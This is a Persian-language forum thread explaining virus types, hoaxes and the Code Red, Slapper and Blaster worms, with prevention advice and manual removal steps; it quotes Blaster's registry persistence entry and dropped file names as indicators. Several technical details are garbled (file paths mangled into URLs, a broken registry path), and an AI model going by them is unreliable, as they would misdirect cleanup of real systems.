برای مثال به خیال خودتان بازی جدید ومهیجی راازاینترنت Download کرده اید ولی
وقتی آنرا اجرا می کنید متوجه خواهید شد که تمامی فایلهای روی هارد دیسک پاک شده ویا به طور کلی فرمت گردیده است.
کرمها WORM
برنامه کرم برنامه ای است که با کپی کردن خود تولید مثل می کند. تفاوت اساسی میان کرم وویروس این است که کرمها برای تولید مثل نیازبه برنامه ی میزبان ندارند.کرمها بدون استفاده ازیک برنامه ی حامل به تمامی سطوح سیستم کامپیوتری « خزیده » ونفوذ می کنند.
ویروسهای بوت سکتورو پارتیشن
Boot sector قسمتی ازدیسک سخت و فلاپی دیسک است که هنگام راه اندازی سیستم ازروی آن به وسیله کامپیوترخوانده می شود.boot sector یا دیسک سیستم شامل کدی است که برای باز کردن فایلهای سیستم ضروری است.
این دیسکها داده هایی درخود دارند وهمچنین حاوی کدی هستند که برای نمایش پیغام راه اندازی شدن کامپیوتر بوسیله ی آن لازم است.
سکتور پارتیشن اولین بخش یک دیسک است که پس ازراه اندازی سیستم خوانده می شود.
این سکتورراجبدیسک اطلاعاتی نظیرتعداد سکتورها درهر پارتیشن ونیزموقعیت همه ی
پارتیشن ها را درخود دارد.
سکتورپارتیشن رکورد اصلی راه اندازی یا mbr – master boot record نیزنامیده
می شود. بسیاری ازکامپیوترها به گونه ای پیکربندی شده اند که ابتدا ازروی درایو: A
راه اندازی می شوند. این قسمت دربخش set up سیستم قایل تغییرو دسترسی است اگربوت سکتوریک فلاپی دیسک آلوده باشد وشما سیستم را از روی آن راه اندازی کنید ویروس نیزاجرا شده ودیسک سخت راآلوده می کند.
اگر دیسکی حاوی فایلهای سیستمی هم نبوده باشد ولی به یک ویروس بوت سکتوری آلوده باشد وقتی اشتباها دیسک را درون فلاپی درایو قرار دهید وکامپیوتر را دوباره راه اندازی کنید پیغام زیر مشاهده می شود. ولی به هر حال ویروس بوت سکتوری پیش ازاین اجرا شده وممکن است کامپیوترشما رانیز آلوده کرده باشد.
System disk or disk error - non
Replace and press any key when ready
کامپیوترهایی که برپایه یintel هستند در برابر ویروسهای boot sector و Partition آسیب پذیرند.
تا قبل ازاینکه سیستم بالا بیاید وبتواند اجرا شود صرفنظرازنوع سیستم عامل می تواند هرکامپیوتری را آلوده سازد.
-HOAX گول زنگ ها
این نوع ویروسها درقالب پیغام های فریب آمیزی کاربران اینترنت را گول زده وبه کام خود می کشد. این نوع ویروسها طبق معمول به همراه یک نامه ضمیمه شده از طرق پست الکترونیک وارد سیستم می شوند. متن نامه مسلما متن مشخصی نیست وتا حدودی به روحیات شخصی نویسنده ویروس بستگی دارد‘ پیغامها می توانند مضمونی تحد ید آمیزیا محبت آمیزباشند ویا درقالب هشداری مبنی برشیوع یک ویروس جدید اینترنت یا درخواستی درقبال یک مبلغ قابل توجه ویا هرموضوع وسوسه انگیزدیگر باشد. لازم به ذکراست که همه ی این نامه ها اصل نمی باشد یعنی ممکن است بسیاری ازآنها پیغام شخص سازنده ویروس نباشند بلکه شاید پیغام ویرایش شده یا تغییریافته از یک کاربرمعمولی ویا شخص دیگری باشد که قبلا این نامه ها را دریافت کرده وبدینوسیله ویروس را با پیغامی کاملاً جدید مجددا ارسال می کند.
نحوه تغییرپیغام وارسال مجدد آن بسیارساده بوده همین امرباعث گسترش سریع hoax ها شده بایک دستور forward می توان ویروس ومتن تغییرداده شده را برای شخص دیگری ارسال کرد.
اما خوده ویروس چه شکلی دارد؟ ویروسی که درپشت این پیغام های فریب آمیزمخفی شده می تواند به صورت یک بمب منطقی یک اسب تروا ویا یکی ازفایلهای سیستمی ویندوز باشد.
شیوه ای که ویروس A – magistre ازآن استفاده کرده وخود را منتشر می کند.
Sulfnbk یک ویروس یک شوخی ویا هردو؟!
سایت خبری سافس چندی پیش خبری مبنی برشناخته شدن یک ویروس جدید منتشرکرد ویروسی با مشخصه exe . sulfnbk نام فایلی درسیستم عامل ویندوز 98 می باشد که وظیفه بازیابی اسامی طولانی فایلها را برعهده دارد ودرسیستم عامل ویندوز98 فایلی سودمند می باشد.
اینجاست که می توان به مفهوم واقعی hoax ها پی برد فایل exe . sulfnbk که معمولاً ازطریق پست الکترونیکی به همراه یک نامه فریب آمیزوشاید تهدید آمیزبه زبان پروتکلی وارد سیستم ها می شود دقیقا درجایی ساکن می شود که فایل سالم exe . sulfnbk درآنجاست به بیان بهتراینکه جایگزین آن فایل سالم می شود. فایل exe . sulfnbk آلوده درشاخه command ویندوز98 ساکن شده وچون به همان شکل وسایز می باشد به همین منظور کاربرمتوجه حضوریک ویروس جدید درسیستم خود نخواهد شد اینجاست که فریب خورده ویروس خطرناک A – magistre که درهسته این فایل وجود دارد دراول ماه ژوین فعال شده وسازنده خود را به مقصودش می رساند.
نسخه ای دیگرازاین ویروس را می توان یافت که در 25 ماه می فعال می شود. تفاوتی که این ویروس نسخه قبلی خود دارد آن است که روی فایل exe . sulfnbk آلوده در درایو C ساکن می شود.
لازم به ذکراست این ویروس درسیتم عامل ویندوز98 فعال شده وحوزه فعالیتش دردرایو C می باشد.
تشخیص اینکه فایل exe . sulfnbk واقعا آلوده است یا خیردشوارمی باشد البته شاید بعد ازماه ژوین 2002 ازطریق ویروس یابهای جدید مانند mcafee , Norton بتوان آنها را تشخیص داد اما درصورت درسترس نبودن ویروس یابهای مذ کور حداقل می توان exe . sulfnbk را چه آلوده وچه غیرآلوده پاک کرد البته ازآنجایی که فایل exe . sulfnbk یک فایل سیستمی ویندوزبه شمارمی رود ممکن است پاک کردن آن به سیستم لطمه وارد کند ازاین رو بعید نیست قبل ازپاک کردن نسخه ای ازآن را برروی یک فلاپی کپی کرده ونگه داریم. حقیقت آن است که کمترکسی ریسک می کند واین قبیل فایلها را اجرا می کند. پیغامی که ضمیمه این فایل ارسال می شود نیز در چندین نسخه وجود دارد. همانطور که قبلا ذکرشد نسخه اصل پیغام به زبان پرتغالی است اما ترجمه انگلیسی واسپانیولی آن نیزیافته شده است. به هرحال هرویروس چه ازنوع hoax باشد وچه ازانواع دیگرمدتی چه طولانی وچه کوتاه روی بورس است ومعمولا لطمه های جبران ناپذیر خود را درهمان بدو تولد به جای گذاشته وبعد ازمدتی مهارمی شود. نکته قابل توجه این است که با داشتن حداقل آشنایی ازاین ویروسها درهمان شروع کاربه راحتی می توان با نسخه های جدیدترآن ویروس ویا ویروسهای مشابه مبارزه کرد.
CELLSAVER یک اسب تروا
CELCOM SCREEN SAVER – A.K.A CELLSAVER نیزویروسی ازنوع HOAX می باشد وعلا رقم مدت زیادی که ازاولین انتشارآن می گذرد کاربران زیادی را دچار مشکل ساخته است. این ویروس برای کاربران اینترنت ارسال شده است. نسخه نخست آن درسال 1998 ونسخه جدیدترآن کمی بعد در آوریل 1999 به همراه یک پیغام دروغین منتشرشد.
هرگاه نامه ای با عنوان exe . cellsaver به همراه فایلی با همین نام دریافت کردید سریعا آن راپاک کرده واز forward کردن برای شخصی دیگر بپرهیزید اینکار هیچ گونه لذتی نداشته فقط به انتشاروبقای بیشترآن کمک می کند. این فایل یک اسب تروا کامل می باشد یک فایل saver Screen زیبا برای ویندوزکه به محض اجرا شدن هر کسی را مجذوب ومسحور می گرداند.
احتیاط کنید! exe . cellsaver به محض اجرا شدن یک گوشی تلفن بی سیم nokia را بصورت یک saver screen برروی صفحه نمایش نشان می دهد. درصفحه نمایش این گوشی می توان زمان وپیغام را دید بعد ازیک باراجرا شدن ویروس فعال شده وشما خیلی زود متوجه خواهید شد که سیستم بسیار کندعمل کرده قادربه بوت شدن نخواهد بود اطلاعات هارد دیسک نیزپاکسازی می شوند.
درنتیجه مجبور به نصب مجدد کلیه برنامه ها خواهید بود. درآخربازهم یادآورمی شویم که هرگزنامه های دریافتی که کمی ناشنا خته ومشکوک به نظرمی رسند را بازنکنید.
ویروسهای چند جزئی multipartite virus
بعضی از ویروسها ترکیبی از تکنیکها را برای انتشاراستفاده کرده فایلهای اجرائی بوت سکتور وپارتیشن را آلوده می سازند. این گونه ویروس ها معمولا تحت 98 windows یا win.nt انتشارنمی یابند.
چگونه ویروس ها گسترش می یابند ؟
زمانی که یک کد برنامه آلوده به ویروس را اجرا می کنید کد ویروس هم پس از اجرا به همراه کدبرنامه اصلی درمرحله اول تلاش می کند برنامه های دیگر را آلوده کند.این برنامه ممکن است روی همان کامپیوترمیزان یا برنامه ای بر روی کامپیوتردیگر واقع دریک شبکه باشد. حال برنامه تازه آلوده شده نیز پس از اجرا دقیقا عملیات مشابه قبل را به اجرا درمی آورد. هنگامیکه به صورت اشتراکی یک کپی ازفایل آلوده را در دسترس کاربران دیگرکامپیوترها قرار می دهید با اجرای فایل کامپیوترهای دیگر نیز آلوده خواهند شد. همچنین طبیعی است با اجرای هر چه بیشتر فایلهای آلوده فایلهای بیشتری آلوده خواهند شد.
اگرکامپیوتری آلوده به یک ویروس بوت سکتور باشد ویروس تلاش می کند در فضاهای سیستمی فلاپی دیسکها وهارد دیسک ازخود کپی هایی بجا بگذارد سپس فلاپی آلوده می تواند کامپیوترهایی را که ازروی آن بوت می شوند ونیز یک نسخه از ویروسی که قبلا روی فضای بوت یک هارد دیسک نوشته شده نیز می تواند فلاپی های جدید دیگری را نیز آلوده نماید. به ویروسهایی که هم قادربه آلوده کردن فایلها وهم آلوده نمودن فضاهای بوت می باشند اصطلاحا ویروسهای چند جزئی multipartite می گویند.
فایلهایی که به توزیع ویروسها کمک می کنند حاوی یک نوع عامل با لقوه می باشند که می توانند هرنوع کد اجرائی را آلوده کنند. برای مثال بعضی ویروسها کدها را آلوده می کنند که در بوت سکتورفلاپی دیسکها وفضای سیستمی هارد دیسکها وجود دارند. نوع دیگراین ویروس ها که به ویروسهای ماکرو شناخته می شوند‘ می توانند عملیات پردازش کلمه ای word processing یا صفحه های حاوی متن را که ازاین ماکروها استفاده می کنندآلوده می کنند. این امر برای صفحه هایی با فرمت Html نیز صادق است. ازآنجایی که یک کد ویروس باید حتما قابل اجرا شدن باشد تا اثری ازخود به جای بگذارد ازاین رو فایلهایی که کامپیوتر به عنوان داده های خالص وتمیزبا آنها سرو کاردارد امن هستند. فایلهای گرافیکی وصدا مانند فایلهایی با پسوند wav‘ 3mp‘ jpg‘ gif.‘... هستند. برای زمانی که یک فایل با فرمت picture را تماشا می کنید کامپیوترشما آلوده نخواهد شد. یک کد ویروس مجبور است که درقالب یک فرم خاص مانند یک فایل برنامه ای exe یا یک فایل متنی doc که کامپیوتر واقعا آن را اجرا می کند قرار گیرد.

عملیات مخفیانه ویروس درکامپیوتر
همانطورکه می دانید ویروسها برنامه های نرم افزاری هستند آنها می توانند مشابه برنامه هایی باشند که به صورت عمومی دریک کامپیوتر اجرا می گردند. اثر واقعی یک ویروس بستگی به نویسنده آن دارد. بعضی از ویروسها با هدف خاص ضربه زدن به فایلها طراحی می شوند ویا اینکه در عملیات مختلف کامپیوتر دخالت کرده وایجاد مشکل می کنند. ویروسها براحتی بدون آنکه متوجه شوید خود را تکثیر کرده گسترش می یابند درحین گسترش یافتن به فایلها صدمه رسانده ویا ممکن است باعث مشکلات دیگری شوند. نکته : ویروسها قادر نیستند به سخت افزار کامپیوتر صدمه ای وارد کنند.
مثلا نمی توانند باعث ذوب شدنcpu سوختن هارد دیسک ویا انفجار مانیتوروغیره شوند.
ویروسها و E-mail
شما صرفا با خواندن یک متن ساده e-mail یا استفاده از net post ویروسی دریافت نخواهید کرد بلکه باید مراقب پیغام های رمزدار حاوی کدهای اجرائی و یا پیغامهایی بود که حاوی فایل اجرائی ضمیمه شده یک فایل برنامه کد شده ویا یک word document که حاوی ماکروهایی باشد می باشند. ازاین رو برای به کارافتادن یک ویروس یا یک برنامه اسب تروا کامپیوتر مجبور به اجرای کدهایی است می توانند یک برنامه ضمیمه شده به e-mail یک word document دانلود شده از اینترنت ویا حتی مواردی از روی یک فلاپی دیسک باشند .


==================================================
طراحی وب سایت
پروژه های برنامه نویسی تجاری
دانلود پروژه های ASP.NET وب سایتهای آماده به همراه توضیحات
دانلود پروژه های سی شارپ و پایگاه داده SQL Server همراه توضیحات و مستندات
دانلود پروژه های UML نمودار Usecase نمودار class نمودرا activity نمودار state chart نمودار DFD و . . .
دانلود پروژه های حرفه ای پایگاه داده SQL Server به همراه مستندات و توضیحات
پروژه های حرفه ای پایگاه داده Microsoft access به همراه مستندات و توضیحات
دانلود پروژه های کارآفرینی
دانلود گزارشهای کارآموزی کارورزی تمامی رشته های دانشگاهی
قالب تمپلیت های آماده وب سایت ASP.NET به همراه Master page و دیتابیس
برنامه های ایجاد گالری عکس آنلاین با ASP.NET و JQuery و اسلایدشو به همراه کد و دیتابیس SQL کاملا Open Source واکنشگرا و ساده به همراه پایگاه داده
==================================================
یافتن تمامی ارسال‌های این کاربر
نقل قول این ارسال در یک پاسخ
06-05-2017, 10:20 AM
ارسال: #29
RE: ساختار ویروسها و برنامه های مخرب کامپیوتری
نکاتی جهت جلوگیری از آلوده شدن سیستم
نصب کرده وسعی کنید آنرا به روز نگه دارید. اگر فکر می کنید سیستم تان آلوده است سعی کنید قبل ازانجام هر کاری از برنامه آنتی ویروس خود استفاده کنید البته اگر قبل ازاستفاده ازآن آنرا بروز کرده باشید بهتر است سعی کنید بیشتر نرم افزارهای آنتی ویروس را محک زده ومطمئن ترین آنها را برگزینید. البته بعضی وقتها اگراز نرم افزارهای آنتی ویروس قدیمی هم استفاده کنید بد نیست زیرا تجربه ثابت کرده که ویروس یابهای قدیمی بهتر می توانند ویروسهایی را که برای مدتی فعال بوده و به مرور زمان بدست فراموشی سپرده شده اند را شناسا یی و پاکسازی کنند. ولی اگرجزء افرادی هستید که به صورت مداوم با اینترنت سرو کار دارید حتما به یک آنتی ویروس جدید و به روز شده نیازخواهید داشت.
برای درک بهتر و داشتن آمادگی درهر لحظه برای مقابله با نفوذ ویروسها به نکات ساده ی زیر توجه کنید:
1 – همانطورکه دربالا ذکر شد ازیک کمپانی مشهور و شناخته شده بر روی سیستم تان یک نرم افزار آنتی ویروس نصب کرده و سعی کنید همیشه آنرا به روز نگه دارید.
2 – همیشه احتمال ورود ویروسهای جدید به سیستم وجود دارد. پس یک برنامه آنتی ویروس که چند ماه به روز نشده نمی تواند درمقابل جریان ویروسها مقابله کند.
3 – توصیه می شود برای آنکه سیستم امنیتی کامپیوتر از نظم و سازماندهی برخوردار باشد برنامهa.v( آنتی ویروس) خود را سازماندهی نمائید‘ مثلا قسمت configuration نرم افزارa.v خود را طوری تنظیم کنید که به صورت اتوماتیک هر دفعه که سیستم بوت می شود آن را چک نماید این امرباعث می شود سیستم شما درهر لحظه در مقابل ورود ویروس ویا هنگام اجرای یک فایل اجرائی ایمن شود.
4 – برنامه های آنتی ویروس دریافتن برنامه های اسب تروا خیلی خوب عمل نمی کنند از این رو در باز کردن فایلهای باینری و فایلهای برنامه های excel و word که ازمنابع نا شناخته و احیانا مشکوک می باشند محتاط عمل کنید.
5 – اگر برای ایمیل و یا اخبار اینترنتی بر روی سیستم خود نرم افزار کمکی خاصی دارید که قادراست به صورت اتوماتیک صفحات java script و word macro ها و یا هر گونه کد اجرائی موجود ویا ضمیمه شده به یک پیغام را اجرا نماید توصیه می شود این گزینه را غیرفعال (disa bl ) نمائید.
6 – ازباز کردن فایلهایی که ازطریق چت برایتان فرستاده می شوند پرهیز کنید.
7 – اگر احتمالا بر روی هارد دیسک خود اطلاعات مهمی دارید حتما ازهمه آنها نسخه پشتیبان تهیه کنید تا اگر اطلاعات شما آلوده شده اند یا از بین رفتند بتوانید جایگزین کنید.
نکاتی برای جلوگیری از ورود کرمها به سیستم
ازآنجایی که این برنامه ها ( worms ) امروه گسترش بیشتری یافته وباید بیشتر از سایر برنامه های مخرب از آنها دوری کنیم ازاین رو به این نوع برنامه های مخرب بیشتر می پردازیم.
کرمها برنامه های کوچکی هستند که با رفتاری بسیار موذیانه به درون سیستم رسوخ کرده بدون واسطه خود را تکثیر کرده وخیلی زود سراسر سیستم را فرا می گیرند. در زیر نکاتی برای جلوگیری از ورود کرمها آورده شده است.
1 – بیشتر کرمهایی که از طریق E-mail گسترش پیدا می کنند از طریق نرم افزارهای Microsoft Out look و یا out look express وارد سیستم می شوند. اگر شما از این نرم افزار استفاده میکنید پیشنهاد می شود همیشه آخرین نسخه security patch این نرم افزار را از سایت Microsoft دریافت و به روز کنید.
همچنین بهتر است علاوه بربه روز کردن این قسمت از نرم افزار out look سعی کنید سایر نرم افزارها و حتی سیستم عامل خود را نیز در صورت امکان همیشه به روز نگه دارید ویا حداقل بعضی از تکه های آنها را که به صورت بروز در آمده قابل دسترسی است. اگر از روی اینترنت بروز می کنید و یا از cd ها وبسته های نرم افزاری آماده دربازاراز اصل بودن آنها اطمینان حاصل کنید.
2 – تا جای ممکن در مورد e-mail attachment ها محتاط باشید. چه در دریافت e-mail و چه درارسال آنها.
3- همیشه ویندوز خود را در حالت show file extensions قرار دهید.
این گزینه درمنوی toold/ folder option/view با عنوان hide file extensions for Known file types قرار دارد که به صورت پیش فرض این گزینه تیک خورده است تیک آن را بردارید.
4 – فایلهای attach شده با پسوندهای shs و vbs ویا pif را هرگزباز نکنید. این نوع فایلها در اکثرموارد نرمال نیستند وممکن است حامل یک ویروس ویا کرم باشند.
5 – هرگز ضمائم دو پسوندی را باز نکنید.
پسوندهایی مانند neme.bmp.exe ویا name.txt.vbs و....
6 – پوشه های موجود بر روی سیستم خود را به جز در واقع ضروری با دیگر کاربران به اشتراک نگذارید اگر مجبور به این کارهستید اطمینان حاصل کنید که کل درایو ویا شاخه ویندوز خود را به اشتراک نگذاشته اید.
7 – زمانی که از کامپیوتر استفاده نمی کنید کابل شبکه ویا مودم را جدا کرده ویا آنها را خاموش کنید.
8 – اگر از دوستی که به نظر می رسد ناشناس است ایمیلی دریافت کردید قبل از باز کردن ضمائم آن حتما متن را چند بار خوانده و زمانی که مطمئن شدید از طرف یک دوست است آنگاه سراغ ضمائم آن بروید.
9 – توصیه می شود فایلهای ضمیمه شده به ایمیل های تبلیغاتی و یا احیانا weblink های موجود درآنها را حتی الامکان بازنکنید.
10 – از فایلهای ضمیمه شده ای که به هر نحوی از طریق تصاویر و یا عناوین خاص به تبلیغ مسائل جنسی و مانند آن می پردازند دوری کنید. عناوینی مانند porno.exe ویا Pamela-nude.vbsکه باعث گول خوردن کاربران می شود.
11 – به یک آیکون فایلهای ضمیمه شده نیز به هیچ عنوان اعتماد نکنید. چرا که ممکن است کرم هایی در قالب فایل عکس ویا یک فایل متنی فرستاده شود ولی در حقیقت این فایل یک فایل اجرائی بوده و باعث فریب خوردن کاربر می شود.
12 – در messenger هایی مانند icq.irc ویا aol به هیچ عنوان فایلهای ارسالی از جانب کاربران ناشناس on-line در chat system ها را قبول(accept ) نکنید.
13 – از Download کردن فایل از گروه های خبری همگانی نیز پرهیز کنید. Usenet newsزیرا اغلب گروه های خبری خود یکی از علل پخش ویروس می باشند.
یک نوع کرم اینترنتی
حال به شرح حال مختصری از خصوصیات یک کرم معروف که هنوز هم وجود خواب آلوده خود را برروی هزاران وب سرور افکنده و کارشناسان امنیتی رابه تکاپو وا داشته است می پردازیم. راجع به واژه خواب آلود متن زیر را مطالعه کنید.
Codered یک نوع کرم اینترنتی
مرکز تطبیق و هماهنگی cert در پتیسبورگ که مرکزی برای بررسی اطلاعات سری کامپیوتری است اذعان می دارد که ویروس codered احتمالا به درون بیش از 280000 دستگاه متصل به اینترنت که از سیستم عاملهای 4’. Nt و ویندوز 2000 استفاده می کنند نفوذ کرده است. حال آنکه این سیستم عاملها دارای مزیت محافظتی به وسیله نرم افزارهای خطا یاب 5iis و 4iis می باشند.
هنگامی که هر دو گونه این ویروس نسخه های a.29 و codered ii تلاش می کنند تا روی سرورهایی که به وسیله ی سرویسهای شاخص نرم افزارها iis از لحاظ ضعف های عبوری یا مقاومت در برابر ویروس های جدید اصلاح نشده اند نفوذ و منتشر شوند یکی از دو نسخه قدیمی این ویروس طوری تنظیم شده است که صفحات اولیه اتصال اینترنتی معروف به homepage و یا startpageمربوط به وب سرور آلوده شده را از حالت طبیعی خارج سازد.
این ویروس طوری تنظیم شده است که تا بیستمین روز ماه منتشر می شود آنگاه با حالتی که certآن را مرحله ویرانگر نامیده است چنان عمل می کند که خود ویروس محافظ شخصی را بر علیه آدرس اینترنتی داده شده وادار به خراب کاری می کند. جالب است بدانید اولین آدرس اینترنتی داده شده به ویروس وب سرور کاخ سفید بوده است. به نظر می رسد که این ویروس درآخرین ساعت بیست وهفتمین روز ماه بمباران و انتشارهای خود را متوقف کرده وارد مرحله ی خواب موقتی شده وخودرا غیر فعال می کند. حال آیا ویروس قدرت این را دارد که دراولین روز ماه بعد خود را برای فعالیتی
دوباره بیدار کند. یک مرکز تحقیقات تخصصی که در اوهایوایالات کلمبیا شرکتی مشاوره ای و فنی است به بررسی و تست ویروس codered پرداخته وبه این نتیجه رسیده است که این مزاحم خواب آلود می تواند دوباره خود را فعال کرده و فرآیند جستجوی میزبانان جدید را از سر بگیرد. بررسی ها ونتایج به دست آمده نشان می دهند که codered برای شروع فعالیت مجدد فایل مخصوصی را جستجو کرده وتا زمان پیدا کردن آن فایل و ساختن درایو مجازی خاصی به نام تروآ Trojan در حالت خواب باقی می ماند.
کارشناسان فنی براین عقیده اند که این ویروس مجبور نیست خود را بیدار و فعال کند تا برای سیستم ها تهدیدی جدی به حساب آید. درحال حاضر سیستم های آلوده بسیاری وجود دارند که نا خود آگاه برای انتشار و سرایت ویروس به سیستم های دیگر تلاش می کنند. یکی از کارشناسان sarc مراکز تحقیقاتی می گوید: ازآنجا که کامپیوترهای زیادی هستند که ساعتها درسایت تنظیم نشده اند شاهد انتشار مجدد این ویروس خواهیم بود. تنها یکی از سیستم های آلوده برای انتشار موج جدیدی ازاختلالات کافی خواهد بود. محاسبات مرکز تطبیق و هماهنگی cert نشان می دهدکه ویروس 250000 .codered سرور ویندوزهایی که در خلال 9 ساعت اول فعالیت زود هماهنگ خود سرورویندوزهایی که آسیب پذیر بوده اند آلوده ساخته است. بولتن خبری cert تخمین می زند که با شروع فعالیت ویروس از یک میزبان آلوده زمان لازم برای آلوده شدن تمام سیستم هایی که علی رغم استفاده ازنرم افزارهای iis البته نسخه های قدیمی آن همچنان آسیب پذیر مانده اند کمتر از 18 ساعت است ! این رخدادها این سوال را طراحی می کنند که چه تعداد از کامپیوترهای آلوده شده قبلی تا کنون اصلاح وپاکسازی شده اند؟ اگر چه سرور کاخ سفید هدف اصلی حملات خراب کارانه ی codered بوده است . با این حال این کرم کینه جو هنوز مشکلات بسیاری را برای میزبانان به وجود می آورد.
حمله به سیستم های Linux
ویروس معروف و بسیار گسترده ی slapper برای اولین بار در تاریخ 14 سپتامبر 2002 کشف شد .



Slapper یک کرم شبکه
Slapper طی مدت کوتاهی به سرعت هزاران وب سرور در سراسر دنیا را آلوده کردیکی از جالب ترین خصوصیات slapper توانایی آن درایجاد یک شبکه نظیربه نظیراست که برای نویسنده امکان کنترل تمامی شبکه های آلوده شده را بوجود می آورد.
Blaster
کوتاه ومختصر:هدف اصلی این کرم اینترنتی ضربه زدن به مایکروسافت و سایت اینترنتیWindows update.com این کمپانی می باشد نویسنده این کرم با این عمل می خواهد برای کاربرانی که می خواهند عامل ویندوز خود را از این طریق در برابر هجوم این کرم محافظت کنند مشکل ایجاد نماید.
این کرم در کدهای خود حاوی رشته پیغام زیر می باشد:
I just want to say LOVE YOU SAN!! Billy Gates why do you make this
.possibile ? stopmaking money and fix yoursoftware
البته این پیغام در نسخه جدیدتر این کرم /blaster-b32w تغییر کرده است.
کرم blaster از طریق ایمیل گسترش پیدا نمی کند بلکه ازطریق یافتن نسخه های آسیب پذیر ویندوزگسترش می یابد و این کار را از طریق سرویس remot procedur call. Rpc ویندوز انجام می دهد. بنابراین برنامه های محافظ ایمیل قادر به شناسایی این کرم نیستند.
شرکت ها و مدیران شبکه ها می بایست نرم افزارهای محافظ مخصوص این کرم را از روی سایت مایکروسافت دریافت و نیز از صحیح نصب شدن firewall ها بر روی سیستم ها و سرورهای خود اطمینان حاصل کرده و نیز مهمتر از همه آنتی ویروس بروز شده را فراموش نکنند.
شرح و بررسی W 32 A – BLASTER
نامهای مستعار:
.blaster.worm ’ worm- msblast.a ’ 32/lovsan.worm ’ w32w
.poza ’ worm/lovsan.a32win
نوع :
Worm 32win
/blaster- a32w کرمی است که از طریق اینترنت و با استفاده از خطای آسیب پذیری dcomموجود در سرویس remote procedure call-rpc سیسنم عامل های
ویندوز برای اولین بارتوسط کمپانی مایکروسافت در اواسط ماه جولای 2003 فاش و منتشر می شود. لازم به ذکراست این کرم برخلاف اغلب کرمهای دیگراز طریق ایمیل گسترش نمی یابد.
سیستم عاملهایی که در معرض هجوم این کرم می باشند به شرح زیرهستند:
4’.windows nt
Terminal services edition4’.windows nt
2000 windows
Windows xp
2003 windows server
در نسخه های ویندوز xp که به این کرم آلوده می شوند بطور متوالی سرویس rpc متوقف می شوند وپیغامی مبنی بر خاموش شدن سیستم ظاهر می شود system shutdowm وبعد از حدود یک دقیقه سیستم حاوی ویندوز xpدوباره راه اندازی می شود.
ویندوزme’ 98’95 که از سرویس rpc استفاده نمی کنند از این بابت در خطر حمله ی این کرم نیستند. در مسیر یافتن سیستم های آسیب پذیر کرم سیستم راه دور( کامپیوتر آسیب پذیر) را وادار به یافتن فایلی از طریق پروتکل دریافت فایل tftp به عنوان msblast.exe ویا .exe32penisمی نماید این فایل در شاخه ویندوز کپی می شود.
همچنین دستور زیر را دررجیستری ویندوز اضافه می کند:
Html/siftware/microsoft/windows/current version/run/windows auto
Update=msblast.exe
ونیز رشته کاراکترزیردرکدهای این ویروس دیده شده که البته واضح نیست :
I just want to say love you san!! Bhlly gates why do you make this
Possible ؟ .top making money and fix your software
نحوه مقابله و پاکسازی:
Blaster از طریق شبکه اینترنت سایت ها را جستجو کرده و سیستمهایی که دارای خطای آسیب پذیری سرویس محافظتی dcom rpc هستند را یافته و به درون آنها نفوذ می کند.

تمهیداتی برای مدیران شبکه ها
مدیران شبکه ( administrators ) برای مقابله با نفوذ این کرم به درون سیستمها و خنثی کردن آن بهتر است که به روش زیر عمل کنند:
-در مرحله ی اول اگر آنتی ویروس بر روی سیستم شما نصب بود آنرا به روز کنید در غیر اینصورت ازیکی از سایتهای مشهور و قابل اطمینان نظیر سایتهای Symantec ویا mcafee به نصب آنتی ویروس مناسب بپردازید.
-درمرحله بعدی patch مربوط به عملیات خنثی سازی blaster را از سایت Microsoft دریافت کرده وبر روی تک تک سیستمها و سرورها نصب کنید.
-فایل http://ftp.exe ( که یکی از فایلهای برنامه ی ویندوز می باشد ) فایلی است که blaster میتواند از طریق آن به مقاصد خود برسد. پس بهتر است آنرا به فایل http://ftp.exe.old تغییر نام داد وعملیات blaster را خنثی کنید.
راهنمايي براي كا ربرا ن خا نگي
افرادي كه از نسخه هاي ويندوزو 2003,xp,server2000,4nt استفاده مي كنند مي توانند جهت محافظت سيستم خود و حتي پاكسازي آن از آلودگي به نكات زير توجه كنند.
نكته اول:
نرم افزار firewall در محافظت از كامپيوتر به شما كمك مي نمايد. راه اندازي نرم افزار firewall مي تواند معليات مخفيانه كرمها را محدود سازد.
در نسخه ها ي window xpوserver 2003 نرم افزارfirewall موجود مي باشد.
قبل از راه اندازي اين نرم افزار، اگر سيستم مدامreboot شد ، ابتدا ارتباط اينترنتي را قطع كرده و سپس firewall را فعال كنيد.
-1 كاربران XP :
براي راه اندازيfirewall ويندوز xp به ترتيب مراحل زير را انجام دهيد.
-network connection را باز كنيد.
( setting / control panel/ network & internet connection/ (start
menu
سپس روي گزينه network connection كليك كنيد.
بر روي يكي از internet connection هايي كه مايليد محافظت بر روي آن انجام
شود ، كليك كنيد.
سپس در سمت چپ و در قسمت network tasks بر روي settings of this
connections كليك كرده و يا بر روي يكي از connection ها كليك كرده و
گزينه ي propertis را بزنيد.
- در قسمت advanced اگر گزينه " protect my computer network "
تيك داشته باشد ، firewall نيز و اگر تيك آن بر داشته شود ، غير فعال خواهد بود.
براي دريافت اطلاعات بيشتر راجع به اين قسمت ميتوانيد به آدرس زير مراجعه كنيد :
www. Microsoft .com/ security/ incident/ blast.asp
-2 كاربران ويندوز server 2003
براي فعال كردن firewall ويندوز مي توان به آدرس زير مراجعه كرد :
www. Microsoft .com/ technet/ treeview/default.asp
دريافت security patch از سايت مايكرو سافت است .
http:// windowsupdate. Microsoft. Com
نکته سوم : نصب يك آ نتي ويروس uptodate بر روي سيستم مي باشد .
نکته چهارم : پاكسازي كرم از روي سيستم است. كه براي انجام اين كار هم مي توان از ندم افزار آنتي ويروس Uptodate شده استفاده كرد وهم اين كه جهت اطمينان بيشتر بصورت دستي اقدام كرد كه ابتدا بايد كرم موجود در سيستم و در نرم افزار آنتي ويروس را شناسايي كرده و سپس اقدام به پاكسازي آن كنيد .
پاكسازي دستي blaster-a از روي سيستم
1: ابتداكه security patch مخصوص را از سايت ميكروسافت درياقت كرده وبر روي
سيستم نصب نماييد .
2: كليدهاي ctrl+alt+del را به طور هم زمان با هم فشار دهيد.
3: پس از ظاهر شدن پنجره task manager بر روي گزينه ي processes tab كليك كنيد .
4: فايل msblast.exe را در ليست جستجو كنيد.
5 : پس از يافتن فايل بروي آن كليك كرده ، آنرا highlight نموده ، بروي end process
كليك كرده و task manager ببنديد.
6: توسط موتور جستجو گر ويندوز سه فايل
32 teekids.exe, penis.exe , msblast.exe
را (( start/ search )) جستجو كنيد .
احتما لا به همراه فايلهاي اجرا ئي فوق ، فايلهايي با پسوند pif. يافت مي شوند. پس از اتمام عمليات جستجو كليه ي فايلهاي يافته شده با مشخصات بالا را پا ك نمائيد . اين فايلها همگي درشاخه ويندوز يافت مي شوند .
